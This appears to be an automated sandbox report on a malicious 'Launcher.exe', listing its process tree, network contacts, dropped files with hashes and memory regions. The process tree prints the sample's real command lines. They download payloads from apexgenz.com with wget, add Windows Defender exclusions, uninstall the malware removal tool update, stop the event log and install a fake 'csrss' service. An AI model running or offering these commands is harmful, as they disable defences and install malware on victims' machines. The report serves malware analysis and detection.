d3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0222
C:\Users\Admin\AppData\Roaming\services\plugin0222
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0222
"C:\Users\Admin\AppData\Roaming\services\plugin0222"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 580
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin0222
C:\Users\Admin\AppData\Roaming\services\3plugin0222
C:\Users\Admin\AppData\Roaming\services\3plugin0222
"C:\Users\Admin\AppData\Roaming\services\3plugin0222"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 194.87.31.18:3333 | tcp | |
| US | 8.8.8.8:53 | 18.31.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mezla.site | udp |
| NL | 185.209.162.106:80 | mezla.site | tcp |
| US | 8.8.8.8:53 | 106.162.209.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 31.13.26.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
memory/3436-17-0x00000000725E0000-0x0000000072CCE000-memory.dmp
memory/3436-16-0x0000000004B90000-0x0000000004BC6000-memory.dmp
memory/3436-18-0x0000000004AA0000-0x0000000004AB0000-memory.dmp
memory/3436-19-0x0000000004AA0000-0x0000000004AB0000-memory.dmp
memory/3436-20-0x0000000007560000-0x0000000007B88000-memory.dmp
memory/3436-21-0x0000000007C20000-0x0000000007C42000-memory.dmp
memory/3436-22-0x0000000007CC0000-0x0000000007D26000-memory.dmp
memory/3436-23-0x0000000007EA0000-0x0000000007F06000-memory.dmp
memory/3436-24-0x0000000007F10000-0x0000000008260000-memory.dmp
memory/3436-25-0x0000000008280000-0x000000000829C000-memory.dmp
memory/3436-26-0x00000000083E0000-0x000000000842B000-memory.dmp
memory/3436-27-0x0000000008680000-0x00000000086F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5rnaqad.kvf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3436-42-0x0000000009760000-0x00000000097F4000-memory.dmp
memory/3436-43-0x00000000096E0000-0x00000000096FA000-memory.dmp
memory/3436-44-0x0000000009730000-0x0000000009752000-memory.dmp
memory/3436-45-0x0000000009D00000-0x000000000A1FE000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
memory/4664-56-0x00000000725E0000-0x0000000072CCE000-memory.dmp
memory/4664-57-0x0000000006890000-0x00000000068A0000-memory.dmp
memory/4664-58-0x0000000006890000-0x00000000068A0000-memory.dmp
memory/4664-75-0x000000007EE30000-0x000000007EE40000-memory.dmp
memory/4664-76-0x00000000090F0000-0x0000000009123000-memory.dmp
memory/4664-77-0x000000006F380000-0x000000006F3CB000-memory.dmp
memory/4664-78-0x00000000090D0000-0x00000000090EE000-memory.dmp
memory/4664-83-0x0000000009140000-0x00000000091E5000-memory.dmp
memory/4664-84-0x0000000006890000-0x00000000068A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/4664-279-0x00000000093A0000-0x00000000093BA000-memory.dmp
memory/4664-284-0x0000000009390000-0x0000000009398000-memory.dmp
memory/4664-300-0x00000000725E0000-0x0000000072CCE000-memory.dmp
memory/2476-303-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/3436-304-0x00000000725E0000-0x0000000072CCE000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0222.rar
| MD5 | 192ea396deb46406bed716cde8b0fda6 |
| SHA1 | b48459b0e4f8d712150c2db39764d3658678f8ac |
| SHA256 | c56f6db940d4802fce1621bd03c3563869acc5ccf2f8fc7ef6a4cc5d17e0c04d |
| SHA512 | 359fb7a51a6524e5fab57de6b799082e3c9d0582cf0a01a5535d11c02c09803a59da47c5a1d65d6306631fa31e4eb8a03479aec5c877d7e4157f3c60ebeda6e1 |
memory/3436-311-0x0000000004AA0000-0x0000000004AB0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\plugin0222
| MD5 | 17d804b82a9cae6218607478d6213aae |
| SHA1 | f5ff7adb303f6dfe07a86f0dc58ae3d2dd3c3b6f |
| SHA256 | 506c268dd0361e0bec3f2da64ba330cb56ea566fa3a1a6360519b9844ec6cddd |
| SHA512 | ce0983032550ea02b685b132ccc29d2263fbdd189a36bbd89bd9af44fdc5ce1c2446b4ea6af67ceb474880386b1a3ada33aea9ac157a029e15b55e49e39067a8 |
memory/4440-315-0x0000000000EE0000-0x0000000000F68000-memory.dmp
memory/4440-316-0x00000000725E0000-0x0000000072CCE000-memory.dmp
memory/3436-318-0x0000000004AA0000-0x0000000004AB0000-memory.dmp
memory/4440-319-0x0000000005770000-0x0000000005780000-memory.dmp
memory/1620-320-0x0000000000400000-0x000000000046D000-memory.dmp
memory/4440-324-0x00000000725E0000-0x0000000072CCE000-memory.dmp
memory/1620-325-0x0000000000400000-0x000000000046D000-memory.dmp
memory/1620-323-0x0000000000400000-0x000000000046D000-memory.dmp
memory/1620-327-0x0000000000400000-0x000000000046D000-memory.dmp
memory/4220-331-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | 5a7358d53674902c204c6fb1e21c78e4 |
| SHA1 | 1a19c63d8e832037e6b8a2ac956f5541c4efd500 |
| SHA256 | 1eaefc76658bbbfd2b00154813221e361d1fc615ce5636061d2e9a9d97c5cddb |
| SHA512 | f5d16f554634239f4149cbd514cf13dc51080e6fb80f94d07a13afd3dfa00d03cd5bde72493be120451f004aececb350ac0bcf70ae762c404da3773a42f0a3dd |
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
| MD5 | 82a56a666981e9e163a1aba74dc70aa8 |
| SHA1 | 709e44e71ff38d0771d839b74f270c23daa42f64 |
| SHA256 | c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6 |
| SHA512 | ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | d4121fa27ad9f3c93d00312846a7a2cc |
| SHA1 | ce84a218b13b9084b4d30f18fcea720e078c4c9c |
| SHA256 | ffba3263bcdd2a3b008113b62dd9853d80d279350e548f50485b75925c9d5079 |
| SHA512 | 65461ca95eae4d51ee691e5a444e14f2cc18e44089c5137bf9060111c111eaeb31f74ca2b155c41d2e0f1fa3d8d4c8288a68fa47dab4fee9e80a627bd20e2ac8 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5a5a545484abcfd739e596c1ff8753d5 |
| SHA1 | 42543fdc4b7620ba21ba5d27fd4ab45a549eb503 |
| SHA256 | 872b4526efdb11051475cfde82c187adfa80a2496ed9835550c1421a039a203e |
| SHA512 | 7a1516dab7c58455fe687cec52c522aa111d0b454d8c7c390417e134a2e1631a9bd68c71f82c92423dce598244c71c67e7576121e7ea4c931421a3458f798374 |
memory/4036-340-0x00007FF660E30000-0x00007FF6617C5000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | 2e7e79b18cce7c94164385b314d90f53 |
| SHA1 | a7833fce28106e00572c125bc6ea992b8d150a34 |
| SHA256 | 2e6f936a73f307d230802c14a6aafa06c8e53dcec51ae032acc50cb58e245570 |
| SHA512 | dfa49cfb4d64dfc5d20d153c15c696415eccf5da08a4df48f11eeb10bfc29dd3157875c5eca7e6e620113a9191344907828f9c56d8f6018686064ff8b2935c09 |
memory/1492-347-0x000001F7C5DC0000-0x000001F7C5DE2000-memory.dmp
memory/1492-348-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp
memory/1492-350-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp
memory/1492-349-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1382baf175d45c3403f7876af44f4e5d |
| SHA1 | 22ac418cfb7969eb2594103b7b9453ba47d5442f |
| SHA256 | dbd14887459c04a3cfc9794da8ab8e6ccbf6a9ed0762055b15d8e55883308374 |
| SHA512 | 63c7aa001a6b005f6eb04c8484dc7586bf8f7e975ae9c7e9a460c220ae1ffefbb14531067f61e5a5a51f20d4b967c399782c28d70538a12d7aa7ac72fa444b24 |
memory/1492-354-0x000001F7C5FC0000-0x000001F7C6036000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | c2d06c11dd1f1a8b1dedc1a311ca8cdc |
| SHA1 | 75c07243f9cb80a9c7aed2865f9c5192cc920e7e |
| SHA256 | 91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586 |
| SHA512 | db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d |
memory/1492-400-0x000001F7C5E20000-0x000001F7C5E2A000-memory.dmp
memory/1492-401-0x00007FF7D73F0000-0x00007FF7D7400000-memory.dmp
memory/1492-459-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp
memory/1492-483-0x000001F7C5E30000-0x000001F7C5E40000-memory.dmp
memory/1492-493-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp
memory/4036-496-0x00007FF660E30000-0x00007FF6617C5000-memory.dmp
memory/4352-500-0x00007FF790D40000-0x00007FF7916D5000-memory.dmp
memory/3736-503-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp
memory/3736-505-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp
memory/3736-506-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp
memory/3736-526-0x00007FF7D75A0000-0x00007FF7D75B0000-memory.dmp
memory/3736-525-0x0000016D4EFD0000-0x0000016D4EFEC000-memory.dmp
memory/3736-532-0x0000016D4F1B0000-0x0000016D4F269000-memory.dmp
memory/3736-621-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp
memory/3736-624-0x0000016D4EE70000-0x0000016D4EE80000-memory.dmp
memory/164-646-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/3736-658-0x00007FFEE58E0000-0x00007FFEE62CC000-memory.dmp
memory/2928-661-0x0000000140000000-0x000000014000D000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 7575c74a6cb2582fe872ec4e5c34d9ae |
| SHA1 | 8616d5c5687df7133cb3320d131ab82a25197ca7 |
| SHA256 | 5cfc757280526df2130740c4fc1722623bb6a51866af1b4f4fba8acaf2b23064 |
| SHA512 | 8afc0d7c08397a0efc03b313fd9a4986f29c3415ccd640e582fa60a0d3696539243e8d3859cd1b06aea632646b5eb31ffff5cc73ca3df1ac178f44397607b860 |
memory/2928-662-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2928-663-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2928-664-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2928-665-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2928-668-0x0000000140000000-0x000000014000D000-memory.dmp
memory/196-669-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-670-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-671-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-672-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-676-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4352-675-0x00007FF790D40000-0x00007FF7916D5000-memory.dmp
memory/196-679-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-680-0x0000000140000000-0x0000000140AB6000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe
| MD5 | ed8f7b42b7277a00a8f6eb192dc0bd77 |
| SHA1 | 34ff362e6b95852d84580a3430f84da939671c59 |
| SHA256 | 4af7ef4064e4543d12f19d0edc2a7966e3f91412dff582333ecc0d8e599e9a30 |
| SHA512 | 15e66093b010741788c24c4a14c824a5ef92a3de9618e7c9eae002ce90cc6c89ff35228e4b202cb2f538b8fc57688e40eaee07395608f32a291753fc09396c2f |
memory/196-682-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-683-0x0000000140000000-0x0000000140AB6000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\03plugins0222.rar
| MD5 | 4a3baa2e2630e287a5c0e804c0564ca0 |
| SHA1 | c00ae566d6c2dc3f6e20566955d210a16807e028 |
| SHA256 | c039a58e89ffc961c978c61cd8746b95c481251381b62acaec252f26e184e919 |
| SHA512 | 606e9507f80241b932c4f3d4c8fc0207d3e36557d5b1e2837436dc9d6f5b58e7204b18935a091b8a5eff0ea75ef47d14f045cad2a120e43c07de35019849cd16 |
memory/196-686-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-684-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-687-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-688-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-689-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-690-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-691-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-692-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-693-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-694-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-695-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-696-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-697-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-698-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-699-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-700-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-701-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-702-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-703-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-704-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-709-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-710-0x00007FFEF2D70000-0x00007FFEF2F4B000-memory.dmp
memory/196-712-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-711-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-713-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-715-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-716-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-717-0x000001D3297E0000-0x000001D329800000-memory.dmp
memory/196-719-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-720-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-718-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-721-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-722-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/196-724-0x000001D3ABA20000-0x000001D3ABA40000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\3plugin0222
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\services\3plugin0222
| MD5 | 028aef2aedb49bb9148e23b3b7b03d37 |
| SHA1 | 94efee9913eed144e9c1c9727cf82543f65c0ed9 |
| SHA256 | bd3ad16cfba1acfcca16be462fe11c0ad79dda99dac169c160d07cc47b3533c2 |
| SHA512 | a02ebba3a92fcd7869b87e71f3d5e6238fc738eada46f67e8320d7fad7119f676158b67f18bd3272eb1caedbf521f260bd59b9f5517fb257b50d1168d708ba57 |
memory/4632-730-0x00000000002B0000-0x0000000000326000-memory.dmp
memory/4632-731-0x00000000725E0000-0x0000000072CCE000-memory.dmp
memory/4632-732-0x0000000004C80000-0x0000000004C90000-memory.dmp
memory/4632-737-0x00000000725E0000-0x0000000072CCE000-memory.dmp
memory/164-738-0x00000000725E0000-0x0000000072CCE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3plugin0222.log
| MD5 | 807cb75397a3a9fc38e9fb5f8566eb2d |
| SHA1 | 367e151fab5a5a80e60202d287ae522ea53e2563 |
| SHA256 | 3e5056b73303b361e6b7b52f5edb2ed1a7e9dc2c762bb91d18046f42bc2ffcf3 |
| SHA512 | 49efef0401ba0e0dc0b30bdff5d414da5494e4194c6269da2cb40b1ab7dc53e7858d29d2b9982bf3ee60ebc9638b5ed2b5ddcbb536bcc57729e79fc81f59f13d |
C:\Users\Admin\AppData\Roaming\services\3plugin0222
| MD5 | ed890fea49ea376d0464e8f04ee58811 |
| SHA1 | f3134c8c4b2549e38362d1372f6f6b5a2372aee0 |
